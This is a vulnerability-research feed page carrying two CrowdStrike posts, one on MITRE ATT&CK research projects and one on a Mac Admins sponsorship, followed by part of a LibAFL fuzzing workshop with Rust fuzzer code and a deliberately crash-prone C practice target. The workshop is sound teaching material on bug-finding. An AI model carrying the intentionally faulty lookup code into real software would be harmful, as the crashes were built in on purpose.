Normal view

There are new articles available, click to refresh the page.
Before yesterdayVulnerabily Research

CrowdStrike a Research Participant in Two Latest Center for Threat-Informed Defense Projects

  • As a global cybersecurity industry leader and a Research Partner for the MITRE Engenuity Center for Threat-Informed Defense, CrowdStrike provided expertise and thought leadership to two of the Center for Threat-Informed Defense’s latest research projects.
  • The Sensor Mappings to ATT&CK project aimed to map sensors and other data sources to the MITRE ATT&CK® framework techniques so SOCs know which tools and capabilities to check for the use of TTPs that would indicate their environment is under attack.
  • The Insider Threat TTP Knowledge Base Version 2 project sought to enhance a repository of tactics, techniques and procedures (TTPs) used by insider attackers by including nontechnical indicators, plus their respective mitigations, helping organizations prevent and defend against insider cybersecurity threats.

Organizations worldwide rely on the MITRE ATT&CK framework as a critical resource for defending against cyberattacks. The MITRE ATT&CK framework is also a key tool for advancing threat research in the cybersecurity industry. However, one of the challenges in using the MITRE ATT&CK framework is mapping the output from logs, sensors and other tools as ATT&CK data sources in the framework. As a result, it’s not always clear to SOCs how to use the tools and services at their disposal to provide visibility into specific adversary behaviors or threats that put their environment at risk.

The MITRE Engenuity Center for Threat-Informed Defense launched the Sensor Mappings to ATT&CK project to address gaps in this area by mapping sensor events to ATT&CK data sources. When complete, this effort will help SOCs understand which of their tools and/or system capabilities they should monitor to spot specific ATT&CK techniques that adversaries use, as well as identify which tools and/or system capabilities the SOC should acquire to address any gaps in coverage. Ultimately, the Sensor Mappings to ATT&CK project will make the MITRE ATT&CK framework even more valuable.

Sometimes, the threat of a cyberattack comes from within an organization rather than from outside adversaries. Insider threats pose a unique challenge to SOCs. They are often difficult to detect — the attacker is already within the network and possesses valid, active credentials to critical resources — and they can do considerable damage. The Center for Threat-Informed Defense’s initial Insider Threat TTP Knowledge Base project identified the most commonly used TTPs for insider attacks across a wide range of industries for inclusion in a repository. The project also included mitigations for these TTPs, providing a method for organizations to take the actions needed to defend their systems against insider threats.

In the recently completed Version 2 of this project, the TTPs were expanded beyond the technical mechanisms used by insiders on IT systems that were identified in Version 1 to include nontechnical indicators. These observable human indicators (OHIs) include facts about a person or their role that might elevate their risk of being an insider threat.

CrowdStrike was a participant in both of these projects — the latest example of our commitment to cybersecurity industry research.

Sensor Mappings to ATT&CK

There are several key deliverables for the Sensor Mappings to ATT&CK project, which has the ultimate goal of extending ATT&CK data sources to link techniques to tools, capabilities and data sources such as sensors that can provide visibility. Achieving this goal will allow SOCs to better understand their current defensive capabilities so they can fill any gaps (through analytics, tools or other means) and more effectively search for threats.

  1. Methodology: Create a document and specification that describes how to map system logs, sensors and capabilities to ATT&CK data sources.
  2. Data Model: Create a new data model or extend existing models to include data source, data components, data elements, relationships and event/telemetry data.
  3. Mappings: Conform to the specification defined in Methodology, including a resource that will host the mappings for the purposes of review, download and analysis of coverage.
  4. Usability: Identify tools, documentation and other resources.
  5. Logs, Sensors and Capabilities: Include coverage of Sysmon (all events), Windows Event Log (any security-related events), Osquery, auditd, Zeek and AWS CloudTrail.

Mapping: Using Data Sources, Data Components, Data Elements, Relationships and Event/Telemetry Data to Detect Specific ATT&CK TTPs

The model below shows how the domains are mapped together through data sources, data components, data elements, relationships and event/telemetry data.

Figure 1. The goal of this project is to better connect the defensive data in ATT&CK with the way operational defenders analyze potential adversaries/behaviors (Source: Center for Threat-Informed Defense)

 

The Sensor Mappings to ATT&CK project includes the creation of a STIX 2 representation of the mappings (providing ease of use for teams that currently use STIX) as well as a command line interface tool.

Insider Threat TTP Knowledge Base Version 2

Insider threats can be employees, former employees, contractors, partners, service providers or anyone who has knowledge about and/or access to an organization’s computer systems and network. Insider threats are particularly challenging for SOCs to detect and defend against. Security solutions are primarily focused on detecting and defending against cyberattacks launched by external adversaries, so what might otherwise be suspicious behavior from within is often assumed to be legitimate use — if it’s detected at all. In addition, insiders often have the advantage of knowing details about the system and network settings and security measures. They may even have knowledge about exploitable security shortcomings or vulnerabilities.

CrowdStrike was a big part of the initial Insider Threat TTP Knowledge Base project, contributing data and expertise (you can read about that effort here). In Version 2 of the project, the primary deliverable is to expand the scope of the original project to include nontechnical OHIs, including:

  • Subject with elevated privileges
  • Monitoring status of subject
  • Telework status of subject
  • Performance improvement plan required
  • Turnover rate of subject’s role
  • Time at company
  • Management level
  • Seniority of subject
  • Government security clearance

CrowdStrike researchers provided insider threat expertise and anonymized instances of insider threats for aggregation by the Center for Threat-Informed Defense team. This data allowed the team to determine the most common tactics and techniques that are employed by inside actors. In addition, our researchers helped define the mitigations for the identified insider threats and provided thought leadership on topics covered by this research, including the concept of OHIs.

Contributing to Center for Threat-Informed Defense Projects: CrowdStrike’s Ongoing Commitment to Cybersecurity Research and Innovation

CrowdStrike’s commitment to cybersecurity research and innovation is reflected in the best-in-class protection of the CrowdStrike Falcon® XDR platform.

Adversaries never stop their relentless march toward more sophisticated tradecraft, but CrowdStrike researchers and threat analysts are always watching and hunting for novel attack techniques — including insider threats. CrowdStrike researchers publish many of their findings, sharing information in the name of improving defenses globally against dangerous new adversary tactics and previously unknown malware. The findings of CrowdStrike researchers also benefit independent cybersecurity testing organizations, which are able to update their tools and evaluation processes to reflect the latest threats and tactics.

Our commitment to research extends to being a Research Partner at the MITRE Engenuity Center for Threat-Informed Defense. The Center for Threat-Informed Defense’s mission — “to advance the state of the art and the state of the practice in threat-informed defense globally” — is an important one that CrowdStike is proud to support. CrowdStrike’s participation in the Center for Threat-Informed Defense’s Sensor Mappings to ATT&CK and Insider Threat TTP Knowledge Base projects capped a 12-month period in which CrowdStrike participated in four major research initiatives with the Center for Threat-Informed Defense. CrowdStrike looks forward to continuing to provide expertise and thought leadership to the Center for Threat-Informed Defense.

You can learn more about the Center for Threat-Informed Defense’s Sensor Mappings to ATT&CK project here and the Insider Threat TTP Knowledge Base Version 2 project here.

Additional Resources

CrowdStrike Is Proud to Sponsor the Mac Admins Foundation

15 February 2024 at 16:50

CrowdStrike is proud to announce its official sponsorship of the Mac Admins Community through its not-for-profit arm, the Mac Admins Foundation. CrowdStrike joins a distinguished list of sponsors at the highest level.

The Mac Admins Foundation serves as a vibrant hub of collaboration, information sharing and professional growth for the Mac Admins Community. Founded in 2015 and with more than 40,000 members, the Mac Admins Foundation provides a “global online community of IT professionals who specialize in Apple hardware and software.” The community is an amazing network of peers committed to helping each other learn and grow when it comes to all things related to macOS devices.

This focus on community aligns perfectly with the CrowdStrike ethos. CrowdStrike is built on the power of the crowd. Our community consists of tens of thousands of customers, partners and  security practitioners around the world dedicated to defeating adversaries, defending our estates and stopping breaches. 

Also aligned with the CrowdStrike ethos is the focus on innovation. Members of the Mac Admins Community are constantly creating — new ideas, businesses and applications — on their machines. CrowdStrike is also relentlessly working to strengthen organizations’ defenses against evolving cyberattacks without getting in the way of great work. We are proud to know today’s innovators are turning to CrowdStrike to secure their best, most critical work. 

We’re excited to join these two powerful communities to learn from and support each other on our shared missions. 

CrowdStrike: Dedicated to Protecting macOS Devices and Stopping Breaches

MacOS has become a frequent target of cyberattacks as it has increased in popularity for business and enterprise applications. While the macOS provides strong security features, adversaries continue to develop malware specifically targeting macOS, including ransomware, backdoors and trojans.

CrowdStrike is dedicated to protecting the macOS community and devices through research and technology. CrowdStrike researchers continue to track a growing number of attacks targeting macOS devices. The CrowdStrike Falcon® platform delivers industry-leading protection against a broad spectrum of attacks targeting macOS — from commodity and zero-day malware, ransomware and exploits to advanced malware-free and fileless attacks. 

CrowdStrike continually participates in third-party testing to demonstrate the efficacy of the Falcon platform in protecting against macOS threats. In 2023, CrowdStrike Falcon® Pro for Mac won the AV-Comparatives Approved Mac Security Product award for the sixth consecutive year.  During testing, Falcon Pro for Mac achieved 100% protection against Mac malware, with zero false positives and with no observable performance reduction on the Macs used for testing.

During the testing, AV-Comparatives collected 309 Mac malware samples that were representative of what the organization detected being used in the wild during the first half of 2023. Testers inserted USB flash drives containing these malware samples into the Macs, providing the first opportunity for security products to detect and protect against the malware. Any samples that were not detected were then copied to the Mac’s system disk and executed. If a security solution did not detect and neutralize by this stage, it was considered a miss.

Of the 309 Mac malware samples employed during testing, Falcon Pro for Mac had zero misses, providing 100% detection and 100% protection. There were zero false positives recorded. The Mac computers used in testing showed no observable performance reduction thanks to the lightweight Falcon sensor. 

Deepening Our Connection to the Mac Community 

As a global leader in cybersecurity, our commitment to the Mac community starts by delivering the device protection required to keep businesses running on macOS devices. And through the sponsorship of the Mac Admins Community, we’re extending our support to the amazing Mac Admins and the people behind the devices.

We believe that open and technical communities like Mac Admins drive the collaboration needed to build and scale the core technologies that power the software and devices that millions of people love and that countless businesses run on. We’re thankful for the hard work of the Mac Admins Community and proud to be a sponsor. 

Additional Resources

A LibAFL Introductory Workshop

4 December 2023 at 23:54

Intro

Why LibAFL

Fuzzing is great! Throwing randomized inputs at a target really fast can have unreasonable effectiveness with the right setup. When starting with a new target a fuzzing harness can iterate along with your reversing/auditing efforts and you can sleep well at night knowing your cores are taking the night watch. When looking for bugs our time is often limited; any effort spent on tooling needs to be time well spent. LibAFL is a great library that can let us quickly adapt a fuzzer to our specific target. Not every target fits nicely into the "Command-line program that parses a file" category, so LibAFL lets us craft fuzzers for our specific situations. This adaptability opens up the power of fuzzing for a wider range of targets.

Why a workshop

The following material comes from an internal workshop used as an introduction to LibAFL. This post is a summary of the workshop, and includes a repository of exercises and examples for following along at home. It expects some existing understanding of rust and fuzzing concepts. (If you need a refresher on rust: google's comprehensive rust is great.)

There are already a few good resources for learning about LibAFL.

This workshop seeks to add to the existing corpus of example fuzzers built with LibAFL, with a focus on customizing fuzzers to our targets. You will also find a few starter problems for getting hands on experience with LibAFL. Throughout the workshop we try to highlight the versatility and power of the library, letting you see where you can fit a fuzzer in your flow.

Course Teaser

As an aside, if you are interested in this kind of thing (security tooling, bugs, fuzzing), you may be interested in our Symbolic Execution course. We have a virtual session planned for Febuary 2024 with ringzer0. There is more information at the end of this post.

The Fuzzers

The target

Throughout the workshop we beat up on a simple target that runs on Linux. This target is not very interesting, but acts as a good example target for our fuzzers. It takes in some text, line by line, and replaces certain identifiers (like {{XXd3sMRBIGGGz5b2}}) with names. To do so, it contains a function with a very large lookup tree. In this function many lookup cases can result in a segmentation fault.

//...
    const char* uid_to_name(const char* uid) {
        /*...*/ // big nested mess of switch statements
                        switch (nbuf[14]) {
                        case 'b':
                            // regular case, no segfault
                            addr = &names[0x4b9];
                            LOG("UID matches known name at %p", addr);
                            return *addr;
                        /*...*/
                        case '7':
                            // a bad case
                            addr = ((const char**)0x68c2);
                            // SEGFAULT here
                            LOG("UID matches known name at %p", addr); 
                            return *addr;
                        /*...*/

This gives us a target that has many diverting code paths, and many reachable "bugs" to find. As we progress we will adapt our fuzzers to this target, showing off some common ways we can mold a fuzzer to a target with LibAFL.

You can find our target here, and the repository includes a couple variations that will be useful for later examples. ./fuzz_target/target.c

Pieces of a Fuzzer

Before we dive into the examples, let's establish an quick understanding of modern fuzzer internals. LibAFL breaks a fuzzer down into pieces that can be swapped out or changed. LibAFL makes great use of rust's trait system to do this. Below we have a diagram of a very simple fuzzer.

A block diagram of a minimal fuzzer

The script for this fuzzer could be as simple as the following.

while ! [ -f ./core.* ]
do
    head -c 900 /dev/urandom > ./testfile
    cat ./testfile | ./target
done

The simple fuzzer above follows three core steps.

1) Makes a randomized input

2) Runs the target with the new input

3) Keeps the created input if it causes a "win" (in this case a win is crash that produces a core file)

If you miss any of the above pieces, you won't have a very good fuzzer. We all have heard the sad tale of researchers who piped random inputs into their target, got an exciting crash, but were unable to ever reproduce the bug because they didn't save off the test case.

Even with the above pieces, that simple fuzzer will struggle to make any real progress toward finding bugs. It does not even have a notion of what progress means! Below we have a diagram of what a more modern fuzzer might look like.

A block diagram of a fuzzer with feedback

This fuzzer works off a set of existing inputs, which are randomly mutated to create the new test cases. The "mutations" are just a simple set of modifications to the input that can be quickly applied to generate new exciting inputs. Importantly, this fuzzer also uses observations from the executing target to know if a inputs was "interesting". Instead of only caring out crashes, a fuzzer with feedback can route mutated test cases back into the set of inputs to be mutated. This allows a fuzzer to progress by iterating on an input, tracking down interesting features in the target.

LibAFL provides tools for each of these "pieces" of a fuzzer.

There are other important traits we will see as well. Be sure to look at the "Implementors" section of the trait documentation to see useful implementations provided by the library.

Exec fuzzer

Which brings us to our first example! Let's walk through a bare-bones fuzzer using LibAFL.

./exec_fuzzer/src/main.rs

The source is well-commented, and you should read through it. Here we just highlight a few key sections of this simple fuzzer.

//...
        let mut executor = CommandExecutor::builder()
            .program("../fuzz_target/target")
            .build(tuple_list!())
            .unwrap();

        let mut state = StdState::new(
            StdRand::with_seed(current_nanos()),
            InMemoryCorpus::<BytesInput>::new(),
            OnDiskCorpus::new(PathBuf::from("./solutions")).unwrap(),
            &mut feedback,
            &mut objective,
        ).unwrap();

Our fuzzer uses a "state" object which tracks the set of input test cases, any solution test cases, and other metadata. Notice we are choosing to keep our inputs in memory, but save out the solution test cases to disk.

We use a CommandExecutor for executing our target program, which will run the target process and pass in the test case.

//...
        let mutator = StdScheduledMutator::with_max_stack_pow(
            havoc_mutations(),
            9,                 // maximum mutation iterations
        );

        let mut stages = tuple_list!(StdMutationalStage::new(mutator));

We build a very simple pipeline for our inputs. This pipeline only has one stage, which will randomly select from a set of mutations for each test case.

//...
        let scheduler = RandScheduler::new();
        let mut fuzzer = StdFuzzer::new(scheduler, feedback, objective);

        // load the initial corpus in our state
        // since we lack feedback in this fuzzer, we have to force this,
        state.load_initial_inputs_forced(&mut fuzzer, &mut executor, &mut mgr, &[PathBuf::from("../fuzz_target/corpus/")]).unwrap();

        // fuzz
        fuzzer.fuzz_loop(&mut stages, &mut executor, &mut state, &mut mgr).expect("Error in fuzz loop");

With a fuzzer built from a scheduler and some feedbacks (here we use a ConstFeedback::False to not have any feedback except for the objective feedback which is a CrashFeedback), we can load our initial entries and start to fuzz. We use the created stages, chosen executor, the state, and an event manager to start fuzzing. Our event manager will let us know when we start to get "wins".

[jordan exec_fuzzer]$ ./target/release/exec_fuzzer/

[Testcase #0] run time: 0h-0m-0s, clients: 1, corpus: 1, objectives: 0, executions: 1, exec/sec: 0.000
[Testcase #0] run time: 0h-0m-0s, clients: 1, corpus: 2, objectives: 0, executions: 2, exec/sec: 0.000
[Testcase #0] run time: 0h-0m-0s, clients: 1, corpus: 3, objectives: 0, executions: 3, exec/sec: 0.000
[Objective #0] run time: 0h-0m-1s, clients: 1, corpus: 3, objectives: 1, executions: 3, exec/sec: 2.932
[Stats #0] run time: 0h-0m-15s, clients: 1, corpus: 3, objectives: 1, executions: 38863, exec/sec: 2.590k
[Objective #0] run time: 0h-0m-20s, clients: 1, corpus: 3, objectives: 2, executions: 38863, exec/sec: 1.885k
...

Our fragile target quickly starts giving us crashes, even with no feedback. Working from a small set of useful inputs helps our mutations be able to find crashing inputs.

This simple execution fuzzer gives us a good base to work from as we add features to our fuzzer.

Exec fuzzer with custom feedback

We can't effectively iterate on interesting inputs without feedback. Currently our random mutations must generate a crashing case in one go. If we can add feedback to our fuzzer, then we can identify test cases that did something interesting. We will loop those interesting test cases back into our set of cases for further mutation.

There are many different sources we could turn to for this information. For this example, let's use the fuzz_target/target_dbg binary which is a build of our target with some debug output on stderr. By looking at this debug output we can start to identify interesting cases. If a test case gets us some debug output we hadn't previously seen before, then we can say it is interesting and worth iterating on.

There isn't an existing implementation of this kind of feedback in the LibAFL library, so we will have to make our own! If you want to try this yourself, we have provided a template file in the repository.

./exec_fuzzer_stderr_template/

The LibAFL repo provides a StdErrObserver structure we can use with our CommandExecutor. This observer will allow our custom feedback structure to receive the stderr output from our run. All we need to do is create a structure that implements the is_interesting method of the Feedback trait, and we should be good to go. In that method we are provided with the state, the mutated input, the observers. We just have to get the debug output from the StdErrObserver and determine if we reached somewhere new.

impl<S> Feedback<S> for NewOutputFeedback
where
    S: UsesInput + HasClientPerfMonitor,
{
    fn is_interesting<EM, OT>(
        &mut self,
        _state: &mut S,
        _manager: &mut EM,
        _input: &S::Input,
        observers: &OT,
        _exit_kind: &ExitKind
    ) -> Result<bool, Error>
       where EM: EventFirer<State = S>,
             OT: ObserversTuple<S>
    {
        // return Ok(false) for uninteresting inputs
        // return Ok(true) for interesting ones
        Ok(false)
    }
}

I encourage you to try implementing this feedback yourself. You may want to find some heuristics to ignore unhelpful debug messages. We want to avoid reporting too many inputs as useful, so we don't overfill our input corpus. The input corpus is the set of inputs we use for generating new test cases. We will waste lots of time when there are inputs in that set that are not actually helping us dig towards a win. Ideally we want each of these inputs to be as small and quick to run as possible, while exercising a unique path in our target.

In our solution, we simply keep a set of seen hashes. We report an input to be interesting if we see it caused a unique hash.

./exec_fuzzer_stderr/src/main.rs

//...
        fn is_interesting<EM, OT>(
            &mut self,
            _state: &mut S,
            _manager: &mut EM,
            _input: &S::Input,
            observers: &OT,
            _exit_kind: &ExitKind
        ) -> Result<bool, Error>
           where EM: EventFirer<State = S>,
                 OT: ObserversTuple<S>
        {
            let observer = observers.match_name::<StdErrObserver>(&self.observer_name)
                .expect("A NewOutputFeedback needs a StdErrObserver");

            let mut hasher = DefaultHasher::new();
            hasher.write(&observer.stderr.clone().unwrap());
            let hash = hasher.finish();

            if self.hash_set.contains(&hash) {
                Ok(false)
            } else {
                self.hash_set.insert(hash);
                Ok(true)
            }
        }

This ends up finding "interesting" inputs very quickly, and blowing up our input corpus.

...
[Testcase #0] run time: 0h-0m-1s, clients: 1, corpus: 308, objectives: 0, executions: 4388, exec/sec: 2.520k
[Testcase #0] run time: 0h-0m-1s, clients: 1, corpus: 309, objectives: 0, executions: 4423, exec/sec: 2.520k
[Objective #0] run time: 0h-0m-1s, clients: 1, corpus: 309, objectives: 1, executions: 4423, exec/sec: 2.497k
[Testcase #0] run time: 0h-0m-1s, clients: 1, corpus: 310, objectives: 1, executions: 4532, exec/sec: 2.520k
[Testcase #0] run time: 0h-0m-1s, clients: 1, corpus: 311, objectives: 1, executions: 4629, exec/sec: 2.521k
...

Code Coverage Feedback

Relying on the normal side-effects of a program (like debug output, system interactions, etc) is not very reliable for deeply exploring a target. There may be many interesting features that we miss using this kind of feedback. The feedback of choice for many modern fuzzers is "code coverage". By observing what blocks of code are being executed, we can gain insight into what inputs are exposing interesting logic.

Being able to collect that information, however, is not always straight forward. If you have access to the source code, you may be able to use a compiler to instrument the code with this information. If not, you may have to find ways to dynamically instrument your target either through binary modification, emulation, or other sources.

AFL++ provides a version of clang with compiler-level instrumentation for providing code coverage feedback. LibAFL can observe the information produced by this instrumentation, and we can use it for feedback. We have a build of our target using afl-clang-fast. With this build (target_instrumented), we can use the LibAFL ForkserverExecutor to communicate with our instrumented target. The HitcountsMapObserver can use shared memory for receiving our coverage information each run.

You can see our fuzzer's code here.

./aflcc_fuzzer/src/main.rs

//...
        let mut shmem_provider = UnixShMemProvider::new().unwrap();
        let mut shmem = shmem_provider.new_shmem(MAP_SIZE).unwrap();
        // write the id to the env var for the forkserver
        shmem.write_to_env("__AFL_SHM_ID").unwrap();
        let shmembuf = shmem.as_mut_slice();
        // build an observer based on that buffer shared with the target
        let edges_observer = unsafe {HitcountsMapObserver::new(StdMapObserver::new("shared_mem", shmembuf))};
        // use that observed coverage to feedback based on obtaining maximum coverage
        let mut feedback = MaxMapFeedback::tracking(&edges_observer, true, false);

        // This time we can use a fork server executor, which uses a instrumented in fork server
        // it gets a greater number of execs per sec by not having to init the process for each run
        let mut executor = ForkserverExecutor::builder()
            .program("../fuzz_target/target_instrumented")
            .shmem_provider(&mut shmem_provider)
            .coverage_map_size(MAP_SIZE)
            .build(tuple_list!(edges_observer))
            .unwrap();

The compiled-in fork server should also reduce our time needed to instantiate a run, by forking off partially instantiated processes instead of starting from scratch each time. This should offset some of the cost of our instrumentation.

When executed, our fuzzer quickly finds new paths through the process, building up our corpus of interesting cases and guiding our fuzzer.

[jordan aflcc_fuzzer]$ ./target/release/aflcc_fuzzer 

[Stats #0] run time: 0h-0m-0s, clients: 1, corpus: 0, objectives: 0, executions: 0, exec/sec: 0.000
[Testcase #0] run time: 0h-0m-0s, clients: 1, corpus: 1, objectives: 0, executions: 1, exec/sec: 0.000
[Stats #0] run time: 0h-0m-0s, clients: 1, corpus: 1, objectives: 0, executions: 1, exec/sec: 0.000
[Testcase #0] run time: 0h-0m-0s, clients: 1, corpus: 2, objectives: 0, executions: 2, exec/sec: 0.000
[Stats #0] run time: 0h-0m-0s, clients: 1, corpus: 2, objectives: 0, executions: 2, exec/sec: 0.000
...
[Testcase #0] run time: 0h-0m-10s, clients: 1, corpus: 100, objectives: 0, executions: 19152, exec/sec: 1.823k
[Objective #0] run time: 0h-0m-10s, clients: 1, corpus: 100, objectives: 1, executions: 19152, exec/sec: 1.762k
[Stats #0] run time: 0h-0m-11s, clients: 1, corpus: 100, objectives: 1, executions: 19152, exec/sec: 1.723k
[Testcase #0] run time: 0h-0m-11s, clients: 1, corpus: 101, objectives: 1, executions: 20250, exec/sec: 1.821k
...

Custom Mutation

So far we have been using the havoc_mutations, which you can see here is a set of mutations that are pretty good for lots of targets.

https://github.com/AFLplusplus/LibAFL/blob/bd12e060ca263ea650ece0a51a355ac714e7ce75/libafl/src/mutators/scheduled.rs#L296

Many of these mutations are wasteful for our target. In order to get to the vulnerable uid_to_name function, the input must first pass a valid_uid check. In this check, characters outside of the range A-Za-z0-9\-_ are rejected. Many of the havoc_mutations, such as the BytesRandInsertMutator, will introduce characters that are not in this range. This results in many test cases that are wasted.

With this knowledge about our target, we can use a custom mutator that will insert new bytes only in the desired range. Implementing the Mutator trait is simple, we just have to provide a mutate function.

//...
    impl<I, S> Mutator<I, S> for AlphaByteSwapMutator
    where
        I: HasBytesVec,
        S: HasRand,
    {
        fn mutate(
            &mut self,
            state: &mut S,
            input: &mut I,
            _stage_idx: i32,
        ) -> Result<MutationResult, Error> {

            /*
                return Ok(MutationResult::Mutated) when you mutate the input
                or Ok(MutationResult::Skipped) when you don't
            */

            Ok(MutationResult::Skipped)
        }
    }

If you want to try this for yourself, feel free to use the aflcc_custom_mut_template as a template to get started.

./aflcc_custom_mut_template/

In our solution we use a set of mutators, including our new AlphaByteSwapMutator and a few existing mutators. This set should hopefully result in a greater number of valid test cases that make it to the uid_to_name function.

//...
        // we will specify our custom mutator, as well as two other helpful mutators for growing or shrinking
        let mutator = StdScheduledMutator::with_max_stack_pow(
            tuple_list!(
                AlphaByteSwapMutator::new(),
                BytesDeleteMutator::new(),
                BytesInsertMutator::new(),
            ),
            9,
        );

Then in our mutator we use the state's source of random to choose a location, and a new byte from a set of valid characters.

//...
        fn mutate(
            &mut self,
            state: &mut S,
            input: &mut I,
            _stage_idx: i32,
        ) -> Result<MutationResult, Error> {
            // here we apply our random mutation
            // for our target, simply swapping a byte should be effective
            // so long as our new byte is 0-9A-Za-z or '-' or '_'

            // skip empty inputs
            if input.bytes().is_empty() {
                return Ok(MutationResult::Skipped)
            }

            // choose a random byte
            let byte: &mut u8 = state.rand_mut().choose(input.bytes_mut());

            // don't replace tag chars '{{}}'
            if *byte == b'{' || *byte == b'}' {
                return Ok(MutationResult::Skipped)
            }

            // now we can replace that byte with a known good byte
            *byte = *state.rand_mut().choose(&self.good_bytes);

            // technically we should say "skipped" if we replaced a byte with itself, but this is fine for now
            Ok(MutationResult::Mutated)
        }

And that is it! The custom mutator works seamlessly with the rest of the system. Being able to quickly tweak fuzzers like this is great for adapting to your target. Experiments like this can help us quickly iterate when combined with performance measurements.

...
[Stats #0] run time: 0h-0m-1s, clients: 1, corpus: 76, objectives: 1, executions: 2339, exec/sec: 1.895k
[Testcase #0] run time: 0h-0m-1s, clients: 1, corpus: 77, objectives: 1, executions: 2386, exec/sec: 1.933k
[Stats #0] run time: 0h-0m-1s, clients: 1, corpus: 77, objectives: 1, executions: 2386, exec/sec: 1.928k
[Testcase #0] run time: 0h-0m-1s, clients: 1, corpus: 78, objectives: 1, executions: 2392, exec/sec: 1.933k
...

Example Problem

At this point, we have a separate target you may want to experiment with! It is a program that contains a small maze, and gives you a chance to create a fuzzer with some custom feedback or mutations to better traverse the maze and discover a crash. Play around with some of the concepts we have introduced here, and see how fast your fuzzer can solve the maze.

./maze_target/

[jordan maze_target]$ ./maze -p

██████████████
█.██......█ ██
█....██ █.☺  █
██████  █ ██ █
██   ██████  █
█  █  █     ██
█ ███   ██████
█  ███ ██   ██
██   ███  █  █
████ ██  ███ █
█    █  ██ █ █
█ ████ ███ █ █
█          █  
████████████

Found:

  ############
  #          #
# # ### #### #
# # ##  #...@#
# ###  ##.####
#  #  ###...##
##   ## ###..#
######...###.#
##.....#..#..#
#..######...##
#.##.#  ######
#....# ##....#
## #......##.#
[Testcase #0] run time: 0h-0m-2s, clients: 1, corpus: 49, objectives: 0, executions: 5745, exec/sec: 2.585k
Found:

  ############
  #          #
# # ### ####@#
# # ##  #....#
# ###  ##.####
#  #  ###...##
##   ## ###..#
######...###.#
##.....#..#..#
#..######...##
#.##.#  ######
#....# ##....#
## #......##.#
[Testcase #0] run time: 0h-0m-3s, clients: 1, corpus: 50, objectives: 0, executions: 8892, exec/sec: 2.587k

Going Faster

Persistent Fuzzer

In previous examples, we have made use of the ForkserverExecutor which works with the forkserver that afl-clang-fast inserted into our target. While the fork server does give us a great speed boost by reducing the start-up time for each target process, we still require a new process for each test case. If we can instead run multiple test cases in one process, we can speed up our fuzzing greatly. Running multiple testcases per target process is often called "persistent mode" fuzzing.

As they say in the AFL++ documentation:

Basically, if you do not fuzz a target in persistent mode, then you are just doing it for a hobby and not professionally :-).

Some targets do not play well with persistent mode. Anything that changes lots of global state each run can have trouble, as we want each test case to run in isolation as much as possible. Even for targets well suited for persistent mode, we usually will have to create a harness around the target code. This harness is just a bit of code we write to call in to the target for fuzzing. The AFL++ documentation on persistent mode with LLVM is a great reference for writing these kinds of harnesses.

When we have created such a harness, the inserted fork server will detect the ability to persist, and can even use shared memory to provide the test cases. LibAFL's ForkserverExecutor can let us make use of these persistent harnesses.

Our fuzzer using a persistent harness is not much changed from our previous fuzzers.

./persistent_fuzzer/src/main.rs

The main change is in telling our ForkServerExecutor that it is_persistent(true).

//...
        let mut executor = ForkserverExecutor::builder()
            .program("../fuzz_target/target_persistent")
            .is_persistent(true)
            .shmem_provider(&mut shmem_provider)
            .coverage_map_size(MAP_SIZE)
            .build(tuple_list!(edges_observer))
            .unwrap();

The ForkserverExecutor takes care of the magic to make this all happen. Most of our work goes into actually creating an effective harness! If you want to try and craft your own, we have a bit of a template ready for you to get started.

./fuzz_target/target_persistent_template.c

In our harness we want to be careful to reset state each round, so we remain as true to our original as possible. Any modified global variables, heap allocations, or side-effects from a run that could change the behavior of future runs needs to be undone. Failure to clean the program state can result in false positives or instability. If we want our winning test cases from this fuzzer to also be able to crash the original target, then we need to emulate the original target's behavior as close as possible.

Sometimes it is not worth it to emulate the original, and instead use our harness to target deeper surface. For example in our target we could directly target the uid_to_name function, and then convert the solutions into solutions for our original target later. We would want to also call valid_uid in our harness, to ensure we don't report false positives that would never work against our original target.

You can inspect our persistent harness here; we choose to repeatedly call process_line for each line and take care to clean up after ourselves.

./fuzz_target/target_persistent.c

Where previously we saw around 2k executions per second for our fuzzers with code coverage feedback, we are now seeing around 5k or 6k, still with just one client.

[Stats #0] run time: 0h-0m-16s, clients: 1, corpus: 171, objectives: 4, executions: 95677, exec/sec: 5.826k
[Testcase #0] run time: 0h-0m-16s, clients: 1, corpus: 172, objectives: 4, executions: 96236, exec/sec: 5.860k
[Stats #0] run time: 0h-0m-16s, clients: 1, corpus: 172, objectives: 4, executions: 96236, exec/sec: 5.821k
[Testcase #0] run time: 0h-0m-16s, clients: 1, corpus: 173, objectives: 4, executions: 96933, exec/sec: 5.863k
[Stats #0] run time: 0h-0m-16s, clients: 1, corpus: 173, objectives: 4, executions: 96933, exec/sec: 5.798k
[Testcase #0] run time: 0h-0m-16s, clients: 1, corpus: 174, objectives: 4, executions: 98077, exec/sec: 5.866k
[Stats #0] run time: 0h-0m-16s, clients: 1, corpus: 174, objectives: 4, executions: 98077, exec/sec: 5.855k
[Testcase #0] run time: 0h-0m-16s, clients: 1, corpus: 175, objectives: 4, executions: 98283, exec/sec: 5.867k
[Stats #0] run time: 0h-0m-16s, clients: 1, corpus: 175, objectives: 4, executions: 98283, exec/sec: 5.853k
[Testcase #0] run time: 0h-0m-16s, clients: 1, corpus: 176, objectives: 4, executions: 98488, exec/sec: 5.866k

In-Process Fuzzer

Using AFL++'s compiler and fork server is not the only way to achieve multiple test cases in one process. LibAFL is an extremely flexible library, and supports all sorts of scenarios. The InProcessExecutor allows us to run test cases directly in the same process as our fuzzing logic. This means if we can link with our target somehow, we can fuzz in the same process.

The versatility of LibAFL means we can build our entire fuzzer as a library, which we can link into our target, or even preload into our target dynamically. LibAFL even supports nostd (compilation without dependency on an OS or standard library), so we can treat our entire fuzzer as a blob to inject into our target's environment. As long as execution reaches our fuzzing code, we can fuzz.

In our example we build our fuzzer and link with our target built as a static library, calling into the C code directly using rust's FFI.

Building our fuzzer and causing it to link with our target is done by providing a build.rs file, which the rust compilation will use.

./inproc_fuzzer/build.rs

//...
    fn main() {
        let target_dir = "../fuzz_target".to_string();
        let target_lib = "target_libfuzzer".to_string();

        // force us to link with the file 'libtarget_libfuzzer.a'
        println!("cargo:rustc-link-search=native={}", &target_dir);
        println!("cargo:rustc-link-lib=static:+whole-archive={}", &target_lib);

        println!("cargo:rerun-if-changed=build.rs");
    }

LibAFL also provides tools to wrap the clang compiler, if you wish to create a compiler that will automatically inject your fuzzer into the target. You can see examples of this in the LibAFL examples.

We will want a harness for this target as well, so we can pass our test cases in as a buffer instead of having the target read lines from stdin. We will use the common interface used by libfuzzer, which has us create a function called LLVMFuzzerTestOneInput. LibAFL even has some helpers that will do the FFI calls for us.

